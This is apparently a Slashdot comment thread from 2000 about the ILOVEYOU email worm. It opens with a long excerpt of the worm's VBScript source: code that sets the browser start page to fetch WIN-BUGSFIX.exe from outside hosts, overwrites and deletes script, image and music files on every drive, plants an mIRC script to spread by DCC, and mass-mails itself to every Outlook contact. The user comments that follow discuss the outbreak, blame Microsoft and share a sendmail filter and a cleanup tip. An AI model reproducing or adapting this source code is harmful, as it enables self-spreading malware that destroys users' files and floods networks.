regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbv g/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPh jasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg /WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFIX",downread&"\ WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software \Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwar e\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR -YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"

This HTML file need ActiveX Control

To Enable to read this HTML file
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+ch r(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+c hr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+ch r(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-Y OU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU .HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

Stopping email viruses. (1)

Znork (31774) | more than 14 years ago | (#1092612)

These kinds of viruses will continue to proliferate and cause massive disruptions and cost huge amounts of money until several large corporations get together and sue Microsoft (or other mail program manufacturers) for negligence and demand the companys selling the faulty programs pay for the costs.

The dangers of allowing running of attached programs automatically or even easily is guaranteed to cause just this problem. It will happen. It will be repeated. On a yearly basis now, perhaps, but more likely on a monthly or weekly basis in the future. The _only_ way to stop it from happening is to stop the mail program creators from _having_ these 'features'.

Linux version (2)

hoss10 (108367) | more than 14 years ago | (#1092613)

> Pine/Elm/Mutt users as always laugh maniacally
Stop being so arrogant. It's just an executable attachment.

For a linux version just write a bash script that'll read the users address book and send it on aswell.

This is one reason NOT to want world domination. In that case it'll spread easily

------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -

Re:OPening e-mail attachments (2)

slim (1652) | more than 14 years ago | (#1092614)

OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...

As I understand it (second hand), if the mail shows up in a preview pane in Outlook Express, then the script runs without user intervention.

Now *that* is crappy design...
--

Re:Pretty Nasty actually (1)

scrutty (24640) | more than 14 years ago | (#1092615)

I'm just reporting what our NT admins were saying. I don't know anything about Windows really. It was still pretty amazing watching how fast it spread itself

Xerox getting mauled ... (1)

BadERA (107121) | more than 14 years ago | (#1092616)

Here at Xerox we're getting pounded ... people are such IDIOTS!

Remember to blame Microsoft! (1)

dmorin (25609) | more than 14 years ago | (#1092617)

For every story you see, for every person that warns you, remember to explain nicely and calmly to them that these things wouldn't happen if Microsoft didn't have an operating systems monopoly. Seriously. People can believe all the MS propaganda and FUD they want, but if you can show them how MS is directly responsible for them getting a virus, maybe that they'll understand.

-d, laughing with the rest of the Linux users

Heise has it covered (1)

laron (102608) | more than 14 years ago | (#1092618)

http://www.heise.de [heise.de] Site is in German, You may want to use this little fish [digital.com]

It's just E-mail replication... (1)

Stonehand (71085) | more than 14 years ago | (#1092619)

"Who needs Outlook, when Outlook can be broken?"

{ducks}

Hrm. How many kids have ever been famous (as youngsters), historically? And would worms be reduced if the actors were *never* mentioned in press, and were basically guaranteed no fame except perhaps in their local justice system?

Re:Total Cost of ownership if Outlook/Exchange (1)

sTeF (8952) | more than 14 years ago | (#1092620)

sorry made a few mistakes:
s/window/windows/
but most^H^H^H^Hnobody is that stupid

Microsoft Announcement (3)

Sargent1 (124354) | more than 14 years ago | (#1092621)

Early this morning, in response to the virus, the AP had the following report about Microsoft:

--

SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"

"Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."

"At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."

--

Sargent

Re:Solution for Postfix (5)

otmar (32000) | more than 14 years ago | (#1092622)

Sendmail can filter that crap as well, just add

HSubject: $>local_check_header_subject
D{loveletterMessage}"553 Your message may contain a worm."
Slocal_check_header_subject
RILOVEYOU $#error $: ${loveletterMessage}

to your sendmail.cf (version > 8.9 !).

(there is a tab between the ILOVEYOU and $#error.)

/ol (credits go to a cow-orker, though)

Thanks lords, I don't use windows (1)

f5426 (144654) | more than 14 years ago | (#1092623)

One of my coworkers just walked in my office, saying 'what are .vbs documents' ?

So I looked at it, seeing the obvious VB virus in it.

Thanksfully, the OS this guy use is OPENSTEP42. Two minutes later, I received it (via gnustep discussion list). Happily, I run Mac OS X Server.

Cheers,

--fred

Re:E-mail too versatile? (2)

ptomblin (1378) | more than 14 years ago | (#1092624)

The problem isn't just that email is too versatile, but that people are too damned stupid. I could send a malicious linux binary via "mutt", and some idiot somewhere would be stupid enough to execute it.
--
A "freaking free-loading Canadian" stealing jobs from good honest hard working Americans since 1997.

Warning! Warning! (1)

B. Samedi (48894) | more than 14 years ago | (#1092625)

I can't wait to see traditional media respond to this. "A horrible virus from that insidous Internet thing is out there looking for your children! Details later after some other inane news."

A new Outlook? (1)

Ho-Lee-Cow! (173978) | more than 14 years ago | (#1092626)

This is an Outlook trojan. Shocker.

I'm sure M$ will deny that it even exists, talk about dark hearted hackers...then not bother to fix the bug...I'm sorry, feature that allows it to do this.

SO glad I use Eudora and Pine.

Re:Bad Worm. (2)

BrianW (180468) | more than 14 years ago | (#1092627)

What a treat. Is it just me or are viruses that affect e-mail seen as so much scarier since the user gets to see something, as opposed to other viruses that do damage and don't announce themselves.

I think it's seen as being an easy way evil hackers can get at your machine, especially as people (and the media) don't seem to realise that the user has to open the email - it doesn't happen automatically. And, as an automatic it-comes-from-cyberspace-to-take-over-your-machine virus sounds sufficiently scary, it gets lots of media coverage.

Funniest thing I've read in years! (4)

ToLu the Happy Furby (63586) | more than 14 years ago | (#1092628)

From the MSNBC article [msnbc.com] :

"It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."

Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.

"I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected."
(emphasis mine)

The acticle even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".

Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-X 11-to-use-the-Internet and all of that, but shouldn't there be a law against letting people this ignorant operate important computers in financial institutions??

I mean, I'm joking of course.

Or at least I think I'm joking...

Re:This hit where I work. (2)

GC (19160) | more than 14 years ago | (#1092629)

A lot of users will just see LOVE-LETTER-FOR... especially in outlook. For me - it was the icon that gave it away.

disapointed (2)

Duxup (72775) | more than 14 years ago | (#1092630)

My office got it this morning.
Of course the "IT staff" referred to it as a "hacker attack" *sigh* Without fail I look in my inbox every time these e-mail "viruses" hit and I'm disappointed with the # of cow-workers whom I communicate with who seemed fairly intelligent to me, up until this very point.

Nasty SOB (1)

CvD (94050) | more than 14 years ago | (#1092631)

It doesn't only send itself via email to everyone on your list, it also (if you use mIRC) sends it to others using DCC. It wipes out files with the following extensions: MP3, MP2, CSS, HTML, JPG, JPEG, JSE, WSH, JS, SCT, HTA, and VBS (may have forgotten some). It'll muck about in your registry. It's not only in the UK... it's sweeping accross the continent as people are logging in and reading their email. Apparently it originated from Manilla, the Philippenes (or so it says in the script itself), but this maybe someone who is making someone else look bad (the email address in the script says: ispyder@mail.com). It also tries to download an executable (1 of 4 different, random executables). It changes IE's Start Page.

This is someone with a serious grudge against people who use Microsoft mail programs. :-) ... Makes me all the more happy I don't use Windows.

There's a VSB script I saw to fix most of the damage in the registry, but it looks like the site I got it from has been slashdotted, and I don't have the necessary bandwidth to mirror it (or the original script, which I have too). Email me if you do.

Cheers!

Costyn.

Darwinism again (1)

caffeinated_bunsen (179721) | more than 14 years ago | (#1092632)

This is just natural selection in action. People smart enough to use anything but Windoze aren't affected by it, except for mailbox clutter. People who avoid contact with Outlook users aren't affected by it. People who use Windoze and Outlook but are smart enough not to put anything in the hackable-as-hell address book aren't propagating it. People who don't open e-mail attachments without a thought aren't propagating it. Those who have sold their souls (and systems) to Microsoft get screwed by it. Now who can tell me what the moral of this story is?

What a Maron (2)

Zachary Kessin (1372) | more than 14 years ago | (#1092633)

The guy put his email at the top of the virust

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines

The Cure of the ills of Democracy is more Democracy.

mail server filters (2)

crow (16139) | more than 14 years ago | (#1092634)

I received a copy, but our sysadmins have a virus filter built in to the mail server, so the attachment was purged.

That should be the standard approach at any site that runs Windows.

Re:OPening e-mail attachments (2)

weloytty (53582) | more than 14 years ago | (#1092635)

Not true.

The file is an ATTACHMENT. In order for it to run, the user has to doubleclick it. It would be like sending a unix user a perl script that had rm -rf ~/* in it.

Of course, your typical unix user probably wouldnt run such a file, but that isnt an application design issue.

Re:Pretty Nasty actually (1)

TopShelf (92521) | more than 14 years ago | (#1092636)

I use the preview pane, and it hasn't launched from my mailbox. I immediately set up a rule to permanently delete these emails upon receipt, but our office (in Indianapolis) is flooded with this crap.

Re:Maybe this can get companies to consider UNIX? (2)

sterwill (972) | more than 14 years ago | (#1092637)

Sendmail is an MTA, not an MUA. I don't see how Sendmail (or any of the better mailers like postfix or qmail) would ever have this problem.

--

when she received 5 copies ? (1)

hoss10 (108367) | more than 14 years ago | (#1092638)

I got suspicious after 1 copy!

1) It's an executable attachment (.vbs - Doh!)
2) It came from a complete stranger

no.1 was enough though

I was too curious though - had to have a look with Notepad ;)

------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -

Re:Maybe this can get companies to consider UNIX? (1)

jaf (121858) | more than 14 years ago | (#1092639)

> Windows is not the problem - Outlook is.

Windows is also the problem - this virus not only reproduces - it also deletes files, changes startup setting for the computer. Those system changes would not be allowed on any normal UNIX system.

Re:OPening e-mail attachments (1)

holdp (24965) | more than 14 years ago | (#1092640)

You mean some people opened this thing? With such
a title its clearly advertising at best.

The lovechild effect (1)

DavidpFitz (136265) | more than 14 years ago | (#1092641)

This morning alone, I've got 9 warning messages from people, each of which were cc:'d to about 50 others. That makes 450 messages, and think of all the times that someone forawarded it on.

So, while I'm feeling all clever running Solaris and not Windows, POP servers everywhere are getting a sort of lovechild effect and getting a second battering!

Wouldn't you think that by now the media would have mentioned something about the evils of VB?

Re:Looks a bit like Melisa (1)

aozilla (133143) | more than 14 years ago | (#1092642)

I hope it is... if not poor ispyder@mail.com is probably getting tons of hate mail right now. from the same people dumb enough to click on the attachment in the first place.

Re:Remember to blame Microsoft! (2)

Zagato-sama (79044) | more than 14 years ago | (#1092643)

So let me get this right, Microsoft directly e-mails the virus to you, then goes over to your computer and forcibly opens the attachment? Wow! In that case, can they come over and cook me dinner while they're at it? I'd like roast linux fool, medium rare.

my office was hit (1)

Numeric (22250) | more than 14 years ago | (#1092644)

Luckily, I came into the office late today and everyone here is scrambling to "repair" their system.

Re:Outlook Strikes Again. (1)

stx23 (14942) | more than 14 years ago | (#1092645)

From my initial investigation it looks like it is totally MS Specific.
Yup.
So own up then how many /. readers have been kicked in the balls?
Not here. I have turned off active scripting, and if there is active content(as in this payload method), I would get a message asking if I want to run it.
However, I'm in the minority. If you care about the security of your machine, you should turn off scripting, and given the attack of Melissa last year, you should be fully aware of the potential risk involved.
This is only going to get worse.

Re:Total Cost of ownership if Outlook/Exchange (5)

Malachi (5716) | more than 14 years ago | (#1092646)

I think we need to see some responsibility on M$'s part to add some checks and balances to their open ended VB scripted Outlook. While we too got his by a Melissa like virus last month the Unix group just chuckled as the windows chickens ran about trying to stop the fire from spreading, or sending more spam by trying to tell people to not check it.

Curiously, can we file suit if one of these things gets really nasty? The last one that hit us just sent the person to a p0rn site and everyone in their addr book, reg keys, desktop, startup. What if this had been a formating virii? Talk about large scale data loss.

-Malachi-

Re:Analysis (1)

biglig2 (89374) | more than 14 years ago | (#1092647)

Not just local drives. It also works on any network drive mappings you have. Ah, the joy of being a sysadmin in the UK and having to run cleans on the mail system in the US while their sysadmins sleep happy sleep...

Whole companies are down (1)

Wizard of OS (111213) | more than 14 years ago | (#1092648)

The company I work for (BaaN [baan.com] ) suffered from the trojan as well. The email network is down (Exchange) as I type. The problem here: everybody uses one shared addressbook with over 4000 (!!) mail adresses. You can image what happens if the trojan gets hold of this ...

Most of the correspondence goes through email around here (because we have departments all over the world) so you can image the damage.

And people ask me why I always ssh to my server to start pine .... *grin*

Slashdot effect (1)

biglig2 (89374) | more than 14 years ago | (#1092649)

You can talk all you like about sites being slashdotted, but just try connecting to http://www.skyinet.net/ ;-)

Re:Linux version (2)

John Fulmer (5840) | more than 14 years ago | (#1092650)

> Stop being so arrogant. It's just an executable
> attachment.

Er, yes, but Pine/Elm/Mutt etc, do not run attachments automatically, don't include a programming language within the application itself, and aren't really susceptable to this sort of thing.

Go ahead. Write a bash script. But you would have to be a COMPLETE idiot to run an unknown shell script, or any unknown application, recieved in e-mail. You certainly wouldn't get this kind of instant mass destruction.

jf
(Laughing manically!)

Re:Total Cost of ownership if Outlook/Exchange (2)

smartin (942) | more than 14 years ago | (#1092651)

Sure I do. I just get the benefit of choosing which calendar I want to use. These things should all be standards based.

quick fix (1)

iyii (173214) | more than 14 years ago | (#1092652)

To get rid of macro virus "ILOVEYOU" This only works if you haven't gotten to get that bugfix file that set the default IE page go to start menu, find files or folders, make sure checkbox for include subfolders is checked, look for *.vbs once search is complete highlight all files(shift-downarrow), then hit shift-del, say yes to all if prompted go to settings, control panel, internet options, set homepage to use blank. shutdown and reboot it also tries to dcc an executable if you have mirc

My company was eat up with this damn thing... (1)

ACK!! (10229) | more than 14 years ago | (#1092653)

Listen, how many email virus outbreaks will it take before people get the clue. If you get five emails with the same subject from people who do NOT love you then don't open the crap it is a virus or useless spam!

It is amazing that someone sits around and takes the time to start this nonsense anyway. God, I hate Outlook and Neanderthal technology it runs on. Still, driving innocent sysadmins insane is not the answer people.

Re:What's love got to do with it? (1)

Guzz (46637) | more than 14 years ago | (#1092654)

This is more than just graffiti. It took down our exchange server at 9:45 this morning. This downtime is costing us a lot of money.

--god, i hate windows.

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?